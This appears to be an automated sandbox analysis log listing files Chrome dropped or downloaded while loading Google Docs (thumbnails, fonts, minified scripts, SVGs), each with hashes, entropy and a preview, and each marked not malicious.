                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/1XZxmQ-ly4KwAb-BtsjjvUvfybZa70zKv04_wfIcqqTY_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..'.IDATx......... ...9>!.)..).......`+,.a..gV.-..#BY..133.#......f...3<7.<3333.gwUJ..J.s..o...].*I)EJ......+o..$.dUe..|..`..!...B....}..K..m.X6.7~..W.t.;.......?...o...K.k......k0...(..X.*...26.I..1.h....Xe.9g.XpU...3.....N..+..0.(_D.s...m....$N.U..0.-l..3Kt..../........PU...?...FU.&C....Z..@.g.D...=.s>.VU..`f. ..G.d{.@?(n....=.R.=..T.}O;.$2s..S..<..."y!$..3..U..y..}..+..}..V..Z....O.[I...._?.....*...\..q....9..CQU...O....c..[...{.[[.:D.,...c..=C.M.}...a....=.aDT..N..9?*... .vf.hp...;.IG....|i..|.'}...(..4 q...........x...].gTD..N.s.}H.t+/H..F.....[.....> .+.._..._....'N...e.....}.c.<...pc+-~....qd.........x.X..s.d.....81g.......V....ovj.BV?......x...a.....:.S.U..mQ.1%=c.9...9+...d.$.J.qX..'..` .m....`....<.....v.mg.1...@f...!.UX.\'z.....)~...g......;~n.X=....g&O.U...z$..B.].....$W...n{Y7....zI.q..6.jI.q.~.nY....@......}i=T'l..0....1&-p.K........9d.{..;.1....j.].+i.)...{.$[U.q.9..=^:.Tmc....W..
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1820)
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):55057
                                                                                                                                                                                                                                        Entropy (8bit):5.513499368874619
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:1tVJGVloLBB/sAn5HjyR6IHoaihLv8kjbkuSyQcfvXswNgPJHzsH6KecOk/si57b:H1LB15HjyRDQv8DIlKm0eTOOF
                                                                                                                                                                                                                                        MD5:FB5ADA04588AA317BFDAA5DDF13B8A15
                                                                                                                                                                                                                                        SHA1:9EB9680A9B375BC57615982CBB46FEE1C468CBBE
                                                                                                                                                                                                                                        SHA-256:D9219A107DF46A54E3FD25E751B201BDE976A4E7B45D941AC0746CAFC5A8FAB9
                                                                                                                                                                                                                                        SHA-512:F7655A2B64090D3634E41FD773DE047D0DDBED3F29427C1BE9EE06EA4D61AC794F3A12FF3ADCA0CADC03A04654C09C91431DD7716F39E1A251D64A911305F9F4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:gapi.loaded_2(function(_){var window=this;._.bs=function(a){return"rtl"==_.Or(a,"direction")};_.cs=function(a,b,c,d){this.left=a;this.top=b;this.width=c;this.height=d};_.g=_.cs.prototype;_.g.clone=function(){return new _.cs(this.left,this.top,this.width,this.height)};_.g.intersects=function(a){return this.left<=a.left+a.width&&a.left<=this.left+this.width&&this.top<=a.top+a.height&&a.top<=this.top+this.height};._.g.contains=function(a){return a instanceof _.Dr?a.x>=this.left&&a.x<=this.left+this.width&&a.y>=this.top&&a.y<=this.top+this.height:this.left<=a.left&&this.left+this.width>=a.left+a.width&&this.top<=a.top&&this.top+this.height>=a.top+a.height};_.g.distance=function(a){var b=a.x<this.left?this.left-a.x:Math.max(a.x-(this.left+this.width),0);a=a.y<this.top?this.top-a.y:Math.max(a.y-(this.top+this.height),0);return Math.sqrt(b*b+a*a)};_.g.getSize=function(){return new _.md(this.width,this.height)};._.g.getCenter=function(){return new _.Dr(this.left+this.width/2,this.top+this.heig
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 56276, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):56276
                                                                                                                                                                                                                                        Entropy (8bit):7.99584957081655
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:768:NOCx/4iDbHOLS4ug42OPixaeyHQ10BBzqyg73BYnNE3f1pP0/U5st:NjDDbHO62ci4ecBBzqyiRYnNEP1pP0/d
                                                                                                                                                                                                                                        MD5:FD4BB1EE55C832AD5041CCC7E814B02C
                                                                                                                                                                                                                                        SHA1:957787D0EC02A6836D9753DC200B7363709F828F
                                                                                                                                                                                                                                        SHA-256:A739B70EB113F5ECCE39C737366B4ABC41AD4011F014C4462B1C539895CCE724
                                                                                                                                                                                                                                        SHA-512:ED393ABEE0B70D1D2A5820F9ECD59D55462DE63F83BA125F0112E941AE35891A4BCAD3931F4E92EE0EBD6A5440083E6D6F917E6B0BF5171037B60F7C88199A0D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/roboto/v47/KFOKCnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmOClHrs6ljXfMMLmbXiAo.woff2
                                                                                                                                                                                                                                        Preview:wOF2..................h..........................f...b..R.`?STATV.....~........X..y.....6.$.... .... ..N[f......7z...U..([!...[._.X...TM.?..i7...,Y.Qf.....+.I.V..$....Ji..".<RJ).]_.Ji...SJs.....{..5H[...0q.H..f.O..3..G.N..B...q..S....vo...QNi5>.~..Ug..W9..O..)u~H...[..:s....._;b.^........k.L@T...4..q.K.7R)|U....G..;...q.....yp.)..H...H....Rp....#.A.........S.8WJ..*t....o..U.SK.....7.U.....a./3..s.zi.(sc.*j....\O.X..9.+@`.x....'.........:"J.....O|.{Ds63.{..rq...y..P.T.&J..._s..>P...P..*WE0..-.UW{.....S.7t......A.......#..AF.wtL4UN..&.."... ..(.@*..........U.7@s.F.0J.(J.D*..d..K...*HX...9.....B.DQ_.2?r.t..IH6..I.)..J...B.-...H....(.(.....".rzw..y.==.Z.k...mv..........u....I..e..q\4p,P.._..{fN..})*R.Y....Ca.....WU. HP$....-S.d .n`..17.e...~.5.../..1S.+?...M.d.4..0I......xS..BIQmS^,.+...9?....~e.TK.a.K..X.t.Pb.S.8..k.......RS.op^h..w9$..T...E..$.j......m......m.^.tx~../.&F..ZYL.B..m...{se.J.c...t.u.k3.M.f...u..Kg.~s.*..n<!_w......D..ma.T.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1364)
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):7862
                                                                                                                                                                                                                                        Entropy (8bit):5.525314332975389
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:YeDrChOOQM0AUiO/OHHht+d2RIiQGhXd1D:YeShnQM5BoyPbp
                                                                                                                                                                                                                                        MD5:C77E0E372E08E4012FF75D3FD96604D0
                                                                                                                                                                                                                                        SHA1:B1342785D463C4746AA665ADBD060F8765ADE734
                                                                                                                                                                                                                                        SHA-256:58683E31C036B648735232DF59AF3E4694E44B10B71A642BCC64FD407050A65C
                                                                                                                                                                                                                                        SHA-512:0AC151BE739D1EBE99810C995945E78E26F688853517D67F18DED75B90DA2C184F07961D4EF582C69DA94BF760CB35166BFBE3E342C7EC4E6B34787A047F5002
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:mK(H1a);.var LQt="docs-approvals-toast-reload",MQt="docs-approvals-toast-unlock",NQt="unlocked";function OQt(a){this.Fa=Q(a)}H(OQt,S);D=OQt.prototype;D.getId=function(){return qq(this,1)};D.hd=function(a){return Qq(this,1,a)};D.NB=function(){return qq(this,5)};D.getStatus=function(){return rq(this,7)};D.Hn=function(){return $q(this,7)};D.getType=function(){return rq(this,13)};D.Ac=function(a){return Rq(this,13,a)};function PQt(a){this.D=a}function QQt(a,c){this.F=a;this.D=c}.function RQt(a){if(a=vul(a)){var c={};return c[Nil]=a,c}return{}}var SQt={inProgress:1,approved:2,declined:4,cancelled:3,statusUnspecified:0,artifactsPending:5,failed:6},TQt={decisionUnspecified:0,noDecision:1,approved:2,declined:3},UQt={typeUnspecified:0,contentReview:1,eSignature:2,alignment:3},VQt={failureReasonUnspecified:0,artifactGenerationFailed:1};.function WQt(a){a=Zo(a);var c=SQt[a.status];if(c===void 0)throw Error("u3");var e=new yfh;Jq(e,3,a.capabilities!==void 0&&a.capabilities.canReview);for(var f=[],
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):8262
                                                                                                                                                                                                                                        Entropy (8bit):4.9222185377974945
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:QFto3keWjDlteuLEeWMi1eOGAzT31O4c13X:6euexemeQT3/ctX
                                                                                                                                                                                                                                        MD5:686166009FA933A53B1E01188DFB9BCC
                                                                                                                                                                                                                                        SHA1:6A73F0F5DF8A2DB1573B8C21FB978296505B7311
                                                                                                                                                                                                                                        SHA-256:E2927415D5E2F2582B3AF6B53F7369CC0482DFB6DD7EDDC7D05BE73A24D00265
                                                                                                                                                                                                                                        SHA-512:F37B98209E5D73505533E8CB2375E319549403C6781ACBA39368716778A0CF234FE1A83C05482CAA9CA9B3055FF507BF07F8C9DC27E8676F64CEE726C434AF85
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="256" height="128" fill="none" viewBox="0 0 256 128">. <g clip-path="url(#a)">. <rect width="256" height="128" fill="#fff" rx="8"/>. <mask id="b" fill="#fff">. <path d="M0 8c0-4.41828 3.58172-8 8-8h240c4.418 0 8 3.58172 8 8v12H0V8Z"/>. </mask>. <path fill="#F0F4F9" d="M0 8c0-4.41828 3.58172-8 8-8h240c4.418 0 8 3.58172 8 8v12H0V8Z"/>. <path fill="#E1E3E1" d="M0 0h256H0Zm256 20.5H0v-1h256v1ZM0 20V0v20ZM256 0v20V0Z" mask="url(#b)"/>. <path fill="#444746" fill-rule="evenodd" d="M137 6h4c2.207 0 4 1.79333 4 4 0 2.2067-1.793 4-4 4h-4c-2.207 0-4-1.7933-4-4 0-2.20667 1.793-4 4-4Zm0 7h4c1.653 0 3-1.3467 3-3 0-1.65333-1.347-3-3-3h-4c-1.653 0-3 1.34667-3 3 0 1.6533 1.347 3 3 3Zm5.333-3.66667-2 1.99997-2-1.99997h4ZM204 8c0 1.10667-.893 2-2 2s-2-.89333-2-2 .893-2 2-2 2 .89333 2 2Zm-1 0c0-.55333-.447-1-1-1-.553 0-1 .44667-1 1s.447 1 1 1c.553 0 1-.44667 1-1Zm-1 2.6667c1.227 0 2.373.3333 3.353.9133.407.2333.647.68.647 1.1467V14h-8v-
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):65824
                                                                                                                                                                                                                                        Entropy (8bit):7.991317996604023
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:nhE7+jyhBS3gOSlRbHo8JcMsshufPgSQmUgRUJ4xCjgpN8JtQpA+RlDLpQ:nhE7NB6Bn2FAQm5Uec8e+/RlDLpQ
                                                                                                                                                                                                                                        MD5:FD04D6A38E980EA0505E49D5C0D6F9A0
                                                                                                                                                                                                                                        SHA1:2CF198E38A6626517929E38578011532238F6AB6
                                                                                                                                                                                                                                        SHA-256:9909587F62CDA63C3EBD40624EA8F3E00EA7C307C81C0E04A842CE91FBE30878
                                                                                                                                                                                                                                        SHA-512:DF3FB32B708CCB6C94923C13509E93B3158F9386AE923B1A6832871119C7DBCCBD2A5B9AF67FF81E3A9A30E7496689585BC02250DF825F8BB4611FA55213B17F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/1jM96bh0VQJ4gusckBwvf17Xxbn5dc2JJ65Srn3liUTg_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(....IDATx............G."tFb.E... ,@X..... ,.a........a...@X..... ,@X...N.{..lI....Mhm.m.c.m.m..Y>..":"#..O].=..ldE........U..z...=s>Ry.1y.....;u.q...Sw.w.qG}../...s.[.....?.-Pp.qv....H..9.2c.|Ws..YZ.c..;.r.qG.l.:W.q..Zg....(..L....^...)....e;g....N....V..N.j.....H.Q.*Z,....._h..=z]*.0.29..92Xp.F...../........O...g.`.S.n=~L.Q...)M.*Q....=aR..d......qg.p.,.....+o..n.]?.O>..g_|..'.}.?C......;r<.....o...hN...........*ua.o.......z.@.t...........t..33..`..>w.s.<I..t.).?z.{._~...;.>u6u.....z.Kf..CG.M.Lu...;..........B.....L0.<....)...M..`....V...4..........E.....e0..E...;`.p....R..8o........}..m...4Y.i.I.&-Z.W?.]0..../j...i...I.u..7@Z.mG.. ..... ..Ys.w.Z.A.F...?.c..X.j..E!..H..:...vA...D.[.kO.....R..|.q..1..7n.....9.N^.UR%:.I.:K.k.5.....q..!#Gc4q..&..k......r...w2.....C..%g31+...........i.[...o.E.-...M7......d*W...O&.......w.%.@t..X..{`(..!........=...?...w.Pc..+...cg`.t..Y.X.7k....,^.....&....;E.i6
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):71359
                                                                                                                                                                                                                                        Entropy (8bit):7.989852377174042
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:1XXmize6u8zE7B2y3KcMQuPNfvxhMRm+k7Kxa7esj:w5CyB2y3K6uPdbHtj
                                                                                                                                                                                                                                        MD5:339DF7AD4183AD038190266CD1109DBB
                                                                                                                                                                                                                                        SHA1:A04129AF3B4B4BDDBABBA33115D703C95CF2C3DD
                                                                                                                                                                                                                                        SHA-256:D587BD38DBBE97BA75323AD1A1C9380FC179EF91B1A181D65FAD20F3B3275BF0
                                                                                                                                                                                                                                        SHA-512:651209F6DAC4177CF4FCA16568272D2024054344FAF4DA17625C3FA2BE679A7A68790E297C426CEC461921BB6AD631463344E199F0FF1692F671C60660CF983D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/1WvT7a6s4AH7MlcpQsl8lMAcUljqfES1Vp7Taw_GP0uQ_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(....IDATx...A......./=K....G....... ,.a............@X..... ,.a........a...@X..... ,@X..... ,.a........u.N.X.......h..E34@ .!B"..$. . 4Yc..q3....,..............N.26@{....:.t(#..+<@X.....KX...a......a........a.... ,a.... ,@X...%,@X...w.<..H...'...3333333/333333.033,.=R.V...q2.......q;...r.\....\pq....V\.....4!...K.wa...>..~sE...v...'...ZI[.+f....u7..i.Z. .O..,.......dG.....Vv`{..y6.q..v.....$`M<..g.?'Zre....x..4..,I..yvC.......+F./nu...r.K.......W7.}..C;...N.X......\.?.h8..>.%/..I.K.........|{.....f...$`.r.K.w...j.Oi..H.....X...%.X>:Xr.>.J.}.......P\.Q_..\..w.P...].?......9Sy...............rxav.z.o....FC1.Vu6.n,c....k.o.......[..3>?..&`M8UuW..^'..v..t.[ti....k..3...;=<....8W}{.._.3.9..i;.$~*5Hzx.R..n.u.k..Q........_...jCO..s..;y.../...p(.....>uF..s..=.]".....]A7.T...-m..p...~p./lo.=....-H.q..c>>......YM8..B.......&.X.V...X......T.L.o...N.8_._..b..qN.....^..M.>y.... !....i9]y.s...{.W|.g....O.....X.o.-=.e;..9
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):92773
                                                                                                                                                                                                                                        Entropy (8bit):7.987030743964374
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:+C+IjJpAIJxICl5dinR9RYoNUt1iCEXFoKxEKPj2y9NZhRPEGpLbV7:F+IjJyIJyCl+R9RHNZcy9NvRXXV
                                                                                                                                                                                                                                        MD5:A37E6BCB3BBAE667BB10E301EA600586
                                                                                                                                                                                                                                        SHA1:F8202213741E7F499F0A91C4057896FA9795A578
                                                                                                                                                                                                                                        SHA-256:D2DB9743A1AA94579B7D08EBD1E89090E3859A06C289D788A0B14C869AB2C0A0
                                                                                                                                                                                                                                        SHA-512:5555ACD324B89E9FBA46D01347C6CA498B8EA6198D1B23E269114F193734BCF9BFFD822B4EA3D6F76D2926A12077F412C148B62BACCAFAF945511FE646DEA20A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/1OsmB3U2paMOYTD_l_p14PK7HHzUeV6ADWQg9qWRwomY_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..j,IDATx...1........_Y+.zB...G.... ,@X......@egH(.@.b.&/om[.m.8.m.{...m.....eL*.).:.*V..R.X....m...k../.....]?.....@....Io.....L.,.....B..q.....L.n2Yb..f...p.}.u9ecG....F\x.O....2)...J.?<#OYC...-.]..<.../...n..A...W..0.uw.n}..OzAN~.....I./&....?..h.5..2"&)...=........(+.......{~..t...4@,.... ......0`..Q..]}].\!i.o.KDV..........yd2y....|B...R.m..K.q8.....9sJ.....>.i$...TSSKa..h...0.......N{.B.R*...:...'...t.4..Z.EAN..Jn$.6"..*UUs...c.Z.C..;....23<........0..{.n7W.KJ.....?..N.a...q..HMn.dr....c7...^"c =|N../..........\.6......*....?r..k....|....+.fT.v.....,M....:K.z.2.....D....e:.1.J..Z.8I..Z$H~.K.Xk_d.p.....>{...}.R..i9...6...}.c....{o...B`x/.=.1s....@8........... z....}8.D.<.P5.g..[l...s&...nx.)......}fT2.@$...47..q.E..iI...@.._..Z...7.......}.>1.kr...n.y...~..z.....SS3{D,..KgZ...C.A..9.4IF"].v..}\.JU.5.h~~>.cD.kv}{...S._..@.UI......^........V.....3Z.4.V.....s..B".g...6.Q............cz.....Ks..;
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 4280, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):4280
                                                                                                                                                                                                                                        Entropy (8bit):7.938204175548688
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:Tt2MC9hRyCoDgukpdZAfYeNXx6EU+jtckAh/G44MBUAgcD/o:u9v6g9ZAfYeRUutckAh/G44MBUAB8
                                                                                                                                                                                                                                        MD5:35F2221688A86314A271F11BBF8E76BD
                                                                                                                                                                                                                                        SHA1:2E56E5FCCE211EEA8CA3709E0A8B33DD89CEDA92
                                                                                                                                                                                                                                        SHA-256:3C1D1B09AF9EA0E4A497CF8F1BAAF915BB032ECA2AE369869566282D156CB25D
                                                                                                                                                                                                                                        SHA-512:188B20E8E1D6C3759B5427A6EA56AB9AD509DDC7A8F6480B6C8E55CD742E26E15D5804B0B518D62226361DDA70AB02C5B2D302D7259F7D521617DC245F2D52FB
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/caveat/v18/WnznHAc5bAfYB2QRah7pcpNvOx-pjfJ9eIOpYQ.woff2
                                                                                                                                                                                                                                        Preview:wOF2.............. h...Y.........................2..f..j.`?STAT..l....x.d.0..6.$.Z. ..~..G.....#......>...L..Y=.......h..mv..t..z........}...If....?7.I........2.....C....fR."O....~.{.-..R...E.n.&c0d.]S...m.4.f..\.Z*.]....5....KA?.&(8...:r...........z&..|...mk.&.H..H.T.x9./.'50........0..(\...1;.4o.v....W.$$.0..TY.B..V.Y.j...!....r....V...e...~.1..,.....J1..`K}......`. ....P 6Cj...e.f......U..... ..P.;...5W.....2PS@X.+.1k&..88>9..H.H.o./.W.a..F...~.._..t.{../.(...7.......5...5Z.\.T$.:...'.!.=.=.DJ.........F..1....@6.?>..;;.....L..s..A.wq..B..:2....+9...KT..Dt.a.+/...v..P......v[h.j$.rA.d@TB..B.&.)!.I.n.w.._t.w!...[.&.N..a....HL.z.Y.....t.F<0..`....2i..L"....+*<.h$....... p...).i..+!..5...+=j..=h..mm.,....o~.u6.Iy.5SQ.....e<..aI....n..&..[..s@.Z.......-.l..J6...=.'>.9..8.&............;n..#.1..8....L.......A.3.....z8L.A.>...c,....z....k.*&.$;.;.QSkA..m...!4. .@V Q...eX..... hh..b..H....?...k.Yf.......;(..(.`/@....9.I@.2.....Q......i^.[I.wa...D..
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):74388
                                                                                                                                                                                                                                        Entropy (8bit):7.990343167436823
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:6JUJjlRtuKup1mSzaYbT+7nwJg2ukuurFU1aHAErZHND:PjlPunp1mJi9uRD1stD
                                                                                                                                                                                                                                        MD5:5822BBB50FB609989F62A41F75E37470
                                                                                                                                                                                                                                        SHA1:A40A1560ADFC4C967FE2D4131996B0E7BAE74513
                                                                                                                                                                                                                                        SHA-256:5FFB14B2F0A80403BD0166FAD0AAB68607FE36CB1DE619DC9052AA02916E308B
                                                                                                                                                                                                                                        SHA-512:8DE7398017A8728A42F17BD27D1343E52E55C8407C07B5D220064CF254E8FD93BF21560FED9504C97E04A34FEAD2D18DB2857F90ED007305C52B450679D746E4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(.."[IDATx.....0.D.Pq$tC.tCBk.....J.[.{E....Ed....`..@.....,..9..+..p.]3...).=5.....`.;u.Z...,2.j..P...G....a...@.....gw.(A..zK.\#8..J.[..lj%Xp...v..H.D..eVU....y<........c.r.L.lYRw.e.c0......L/..B."..Pa...[TIH..p.....;B ....?..6.Z.Rd`b.....5......Wj...k.A...6.Z....p....S.n\>..V.........#.B.m....&......d.+H..... P..K...7.S...........w..A*V.......J..Y.p...}......Y.QI.x.H......*v..Z....ae...H..e......v..p.....8..dD0.CI.67.B..0sH.;9rd.yB...1..e..Z.....8..j...Gcu...WO<...=.L...s.u... ....Es.....(...F.....R..b............}..].*..Z...j....rE.e!...O.....B?....]<....ze&.P@.9N)...2..Vs.U.^.qX.af(.....zBDeY.cD8F....x..7.g.L...x.(.m.+.?.Z%......}.g..j.T....#D....M....5z;.L....)e.....]..[..O~k,..JJ..}.....5........;SS.Z...l....7.w.X.333..^8{...~)$....0ti.s......|....9.]....P.>=..j..;rw...?zH.NI.=v......=..!.4.9.&J.S.J..0.8.9.>..M...............1..&..82x.?[.s..{W.....g...........d.Sg7~....L.........]b<.......UI..
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17482
                                                                                                                                                                                                                                        Entropy (8bit):7.927963830851311
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:6/BIREYZe03V3IgghRaVKINENCjC2I6DjQnbbdBeOuCUkHEfIZr11q:oi2kehRaVBNENoIG0bBBjEkkw111q
                                                                                                                                                                                                                                        MD5:BB9380FD8B95D92BFC95B024793DF18E
                                                                                                                                                                                                                                        SHA1:F5C22C5BF6868779BBD7AF9D9FB22B387F184765
                                                                                                                                                                                                                                        SHA-256:DC137D943C0F79AE2BABE4FF6B7F5982046E8EA373CF0DDF158031A95FA3423B
                                                                                                                                                                                                                                        SHA-512:7D8B54A7890368DCC154E107C368A40ABC67E02E119F78F56D9C35B66423A7955F024F2FCC22CC9A9BBBC37AF071C6A7CCF07E7AAB8700D0BC983D07B4E936BD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..D.IDATx...A.....0....}9....[...... ,@X..... ,.a............@X..... ,.a........a...@X..... ,@X............... ....Q.F....f.....m.m.m.v..d..qRl2.....s....kan...q.w..h........skc....y....S.c.............][Y......\..)..3b.{.:.q..zV..9.....3. .Y#As3.$N...`}=..l........$..ygk.`&.F.canFX..f.......hc.GN.,X........SS..l;.[MM...,.*..................xC.}.++)%...LO.8q..262lj....*..e^<........$1.....8...O......d....?...|1M.............H!..=}.D...hRLTC]MB|,..#X"oV...^.......prt.07C......o^.....U.e..K4.....A..."j..(.^...j...^|..-..*}.......),"X.n.D...X5U.4..).,a...Q.....wo.hki....JdD8G...c.+#-.... ...(......Q........\..@.. ........!X`.6.?..M.,.z....\).t....R...OC].__O......8?....g.........`....7.T.."#.^...b..;:..=j.......Y..8......5...:)$.`.....D.......|x...F=...........K6Y...v.tuL..h.x.A...".. X4t...stx0%)12<...,/........N.(..ap...0.dU....YZ......9...wI8.....D. 1H....4..@%SQV...J.-aiI.T.J%.=...`p...;.F.y...dQN.,X?7.e*....
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (12326)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):326658
                                                                                                                                                                                                                                        Entropy (8bit):4.603902938828657
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:a3eShJKsbvlHf9iugSc0UtUPGh9ejoN14hOvg/2tUcUJImJDedrJV:M/2kimIdrJV
                                                                                                                                                                                                                                        MD5:4D5FF1F9E34D2EA32AF617C70CC65E85
                                                                                                                                                                                                                                        SHA1:662BCE42E5C1C5A8A8BC27AF424626DEC96C8C9E
                                                                                                                                                                                                                                        SHA-256:C42CDFE647099D197915107F186DC0B593393C7D63C9618C5D2C8E2314B4B054
                                                                                                                                                                                                                                        SHA-512:D63FFC84F79EA16F6F7D9511F338B8EB0320E3084775F49F2E4371579446A87A7D8C142E7A3D78279FF72E3A8C1AF35242CD413FB99F804733FC2D5CDBC0E2AD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://docs.google.com/static/document/client/js/94279402-client_js_prod_emojidata.js
                                                                                                                                                                                                                                        Preview:mK(GUa);.function jKu(a){ckl(a);a=a.Fa;var c=a[Ep]|0;a.length=c&512?1:0;Fp(a,c&-257);uqb(a)}function kKu(a){this.Fa=Q(a)}H(kKu,S);kKu.prototype.J4=function(){return xq(this,1)};function lKu(a){this.Fa=Q(a)}H(lKu,S);function mKu(a){this.Fa=Q(a)}H(mKu,S);function nKu(a){this.Fa=Q(a)}H(nKu,S);var oKu=nr(nKu);function pKu(a){this.Fa=Q(a)}H(pKu,S);var qKu=nr(pKu),rKu=nr(cqk);function sKu(a){this.Fa=Q(a)}H(sKu,S);var tKu=nr(sKu);function uKu(a){this.Fa=Q(a)}H(uKu,S);var vKu=nr(uKu);.function wKu(a,c){return a.filter(c?function(e){return zq(e,2)===c}:B(!0)).flatMap(function(e){return iq(e,kKu,1,$p()).map(function(f){return f.J4()})})}var xKu=/[#*0-9]\uFE0F?\u20E3|[\xA9\xAE\u203C\u2049\u2122\u2139\u2194-\u2199\u21A9\u21AA\u231A\u231B\u2328\u23CF\u23ED-\u23EF\u23F1\u23F2\u23F8-\u23FA\u24C2\u25AA\u25AB\u25B6\u25C0\u25FB\u25FC\u25FE\u2600-\u2604\u260E\u2611\u2614\u2615\u2618\u2620\u2622\u2623\u2626\u262A\u262E\u262F\u2638-\u263A\u2640\u2642\u2648-\u2653\u265F\u2660\u2663\u2665\u2666\u2668\u267B\u
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):46356
                                                                                                                                                                                                                                        Entropy (8bit):7.992270232521654
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:768:dXU5QADZayzK0LblPsIxaNmf5P9ocyhxYvErn748FJO7lwPqvFEFLaJImcY9usp9:dXU5QAdBzK0tsIEero4Erbolw8Um1p9
                                                                                                                                                                                                                                        MD5:BA49C3D0575A1F5820824E4AD4C17DA1
                                                                                                                                                                                                                                        SHA1:FBAE6DD7B9EB27CFCAD43BF179C242EB05DD035B
                                                                                                                                                                                                                                        SHA-256:102736900D8EC23867F45C5741C28724C2E566BD0A989065036ECBFCBA80BA16
